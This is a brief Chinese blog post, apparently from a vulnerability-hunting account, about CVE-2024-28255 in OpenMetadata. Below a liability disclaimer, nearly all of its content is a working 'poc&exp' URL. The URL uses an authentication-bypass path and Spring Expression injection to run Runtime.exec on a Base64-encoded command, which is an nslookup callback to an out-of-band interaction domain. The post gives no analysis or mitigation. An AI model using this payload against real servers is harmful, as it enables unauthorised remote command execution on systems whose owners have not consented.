CVE-2024-28255
CVE-2024-28255
原创 A___bandon 漏洞猎人 2024-04-15 07:16
免责声明:本文所涉及的信息安全技术知识仅供参考和学习之用,并不构成任何明示或暗示的保证。读者在使用本文提供的信息时,应自行判断其适用性,并承担由此产生的一切风险和责任。本文作者对于读者基于本文内容所做出的任何行为或决定不承担任何责任。在任何情况下,本文作者不对因使用本文内容而导致的任何直接、间接、特殊或后果性损失承担责任。读者在使用本文内容时应当遵守当地法律法规,并保证不违反任何相关法律法规。 |
影响版本
OpenMetadata
poc&exp
http://xxx.xxx.xxx.xxx/api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgY29hdnJmdGJscTYyY2syajRiaWdkaHV0a2J0ZDFtd2Q1Lm9hc3Qub25saW5l%22)))